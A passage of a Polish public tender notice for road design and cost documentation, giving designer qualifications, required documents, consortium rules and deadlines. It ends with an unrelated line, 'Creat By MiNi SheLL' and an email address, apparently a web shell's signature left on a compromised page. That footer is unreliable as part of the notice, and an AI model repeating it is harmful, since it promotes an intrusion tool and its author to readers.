minimum jednej dokumentacji projektowo-kosztorysowej budowy, rozbudowy lub przebudowy drogi, która uzyskała pozwolenie na budowę lub została przyjęta zgłoszeniem,<br/><br/>Doświadczenie Projektanta stanowi kryterium oceny ofert w postępowaniu.<br/><br/>•	minimum 1 (jedną) osobę posiadającą uprawnienia do projektowania w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych bez ograniczeń,<br/>• Dla części II: <br/>•	minimum 1 (jedną) osobę projektanta posiadającą uprawnienia do projektowania w specjalności drogowej oraz doświadczenie w opracowaniu kompletnej minimum jednej dokumentacji projektowo-kosztorysowej budowy, rozbudowy lub przebudowy drogi, która uzyskała pozwolenie na budowę lub została przyjęta zgłoszeniem, uzyskała decyzję ZRID.<br/><br/>Doświadczenie Projektanta stanowi kryterium oceny ofert w postępowaniu.<br/><br/>•	minimum 1 (jedną) osobę posiadającą uprawnienia do projektowania w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych bez ograniczeń,<br/>•	minimum 1 (jedną) osobę projektanta, posiadającą uprawnienia bez ograniczeń do projektowania w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych.<br/>Dla części III i części IV: <br/>•	minimum 1 (jedną) osobę projektanta posiadającą uprawnienia do projektowania w specjalności drogowej oraz doświadczenie w opracowaniu kompletnej minimum jednej dokumentacji projektowo-kosztorysowej budowy, rozbudowy lub przebudowy drogi, która uzyskała pozwolenie na budowę lub została przyjęta zgłoszeniem,<br/>•	min. 1 osobę posiadającą uprawnienia do projektowania w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych bez ograniczeń<br/><br/>Informacje dodatkowe:<br/>Na potwierdzenie spełniania powyższego warunku należy złożyć wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia publicznego skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami. <br/><br/>a)	dysponowania sprzętem: <br/><br/>Zamawiający nie stawia wymagań w tym zakresie. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1 W przypadku podmiotów ubiegających się o zamówienie publiczne prowadzących działalność gospodarczą lub zawodową<br/>1. krajowych:<br/>odpis lub informacja z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej;<br/>2. zagranicznych:<br/>dokument potwierdzający, że jest wpisany do jednego z rejestrów zawodowych lub handlowych, prowadzonych w kraju, w którym ma<br/>siedzibę lub miejsce zamieszkania,<br/>wystawiony nie wcześniej niż 6 miesięcy przed jego złożeniem.<br/>2 Wykaz wykonanych usług potwierdzający opisany warunek wraz z dowodami potwierdzającymi należyte wykonanie tych usług - z<br/>wykorzystaniem załącznika nr 4 do SWZ.<br/>Do każdej pozycji wykazu należy załączyć dowody określające, czy wskazane usługi zostały wykonane w sposób należyty.<br/>3 Wykaz osób</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Oświadczenia, o których mowa w rozdziale V ust. 2 SWZ (załącznik nr 2 do SWZ).<br/>2) Oświadczenie podmiotu o udostępnieniu zasobów wskazujące na okoliczności opisane w rozdziale VII ust. 2 SWZ oraz<br/>oświadczenia podmiotu udostępniającego zasoby potwierdzające brak podstaw wykluczenia tego podmiotu oraz<br/>odpowiednio spełnianie warunków udziału w postępowaniu, o których mowa w Rozdziale VI ust. 1 i Rozdziale VII ust. 1 –<br/>jeżeli wykonawca składający ofertę polega na zasobach innych podmiotów;<br/>3) Oświadczenie Wykonawców wspólnie ubiegających się o udzielenie zamówienia, z którego wynika jaki zakres rzeczowy<br/>wykonania zamówienia realizować zamierzają poszczególni Wykonawcy;<br/>4) Pełnomocnictwo w formie oryginału lub notarialnie poświadczonej kopii do reprezentowania wszystkich Wykonawców<br/>wspólnie ubiegających się o udzielenie zamówienia, ewentualnie umowa o współdziałaniu, z której będzie wynikać<br/>przedmiotowe pełnomocnictwo. Pełnomocnik może być ustanowiony do reprezentowania Wykonawców w postępowaniu<br/>albo do reprezentowania w postepowaniu i zawarcia umowy;<br/>5) Pełnomocnictwo lub inne dokumenty, z których wynika prawo do podpisania oferty (oryginał lub kopia potwierdzona „za<br/>zgodność z oryginałem” przez notariusza) oraz do podpisania innych dokumentów składanych wraz z ofertą, chyba, że<br/>Zamawiający może je uzyskać w szczególności za pomocą bezpłatnych i ogólnodostępnych baz danych, w szczególności<br/>rejestrów publicznych w rozumieniu ustawy z dnia 17 lutego 2005 r. o informatyzacji działalności podmiotów realizujących<br/>zadania publiczne (tj. Dz. U z 2020, poz. 346), a Wykonawca wskazał to wraz ze złożeniem oferty, o ile prawo do ich<br/>podpisania nie wynika z dokumentów złożonych wraz z ofertą. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. W przypadku wnoszenia oferty wspólnej przez dwa lub więcej podmioty gospodarcze (konsorcja/spółki cywilne) oferta<br/>musi spełniać wymagania określone w art. 58 ustawy Prawo zamówień publicznych.<br/>2. Wykonawcy wspólnie ubiegający się o udzielenie niniejszego zamówienia ustanawiają Pełnomocnika do reprezentowania<br/>ich w niniejszym postępowaniu albo do reprezentowania i zawarcia umowy w sprawie zamówienia publicznego.<br/>Pełnomocnictwo powinno być załączone do oferty celu ustalenia podmiotu uprawnionego do występowania w imieniu<br/>Wykonawców w sposób umożliwiający ich identyfikację.<br/>3. Wszelka korespondencja prowadzona będzie wyłącznie z Pełnomocnikiem.<br/>4. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika jaki<br/>zakres rzeczowy zamówienia realizować zamierzają poszczególni Wykonawcy.<br/>5. W celu wykazania niepodlegania wykluczeniu z postępowania o udzielenie zamówienia o którym mowa w rozdziale VI<br/>wymagane jest załączenie do oferty oświadczenia i przedłożenia na wezwanie dokumentów dla każdego konsorcjanta<br/>oddzielnie.<br/>6. Zamawiający w stosunku do Wykonawców wspólnie ubiegających się o zamówienie, w odniesieniu do warunku<br/>dotyczącego zdolności technicznej lub zawodowej - dopuszcza łączne spełnienie warunku przez Wykonawców.<br/>7. W przypadku wspólnego ubiegania się dwóch lub więcej Wykonawców o udzielenie niniejszego zamówienia, warunek<br/>udziału jest spełniony jeżeli Wykonawca, ubiegający się o zamówienie wspólnie z innymi wykonawcami, i który dostarcza<br/>potencjał na potrzeby spełnienia warunku udziału w postępowaniu w zakresie wykształcenia, kwalifikacji zawodowych lub<br/>doświadczenia, ma obowiązek osobiście wykonać tę część zamówienia (kluczowy zakres), dla której te zdolności są<br/>wymagane. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający zmiany postanowień zawartej z Wykonawcą umowy oraz ich warunki określił w „Projekcie umowy” <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-10-26 11:30</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę za pośrednictwem Formularza do złożenia oferty dostępnego na ePUAP i udostępnionego również na miniPortalu</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-10-26 12:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-11-24</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1. Termin wykonania dokumentacji i uzyskania pozwolenia na budowę/ otrzymania skutecznego zgłoszenia lub decyzji ZRiD<br/>(w zależności od części zamówienia) wynosi 33 tygodnie od dnia zawarcia umowy, (dla wszystkich części).<br/>2. Wykonawca zobowiązany jest do wykonania przedmiotu zamówienia w następujących etapach:<br/>1) przekazanie Zamawiającemu dwóch wariantowych koncepcji opracowanych w terminie 8 (ośmiu) tygodni od dnia<br/>zawarcia umowy,<br/>2) otrzymanie prawomocnej decyzji pozwolenia na budowę, zgłoszenia lub decyzji ZRiD (w zależności od części umowy) w terminie 33 tygodni od dnia zwarcia umowy.

Creat By MiNi SheLL
Email: jattceo@gmail.com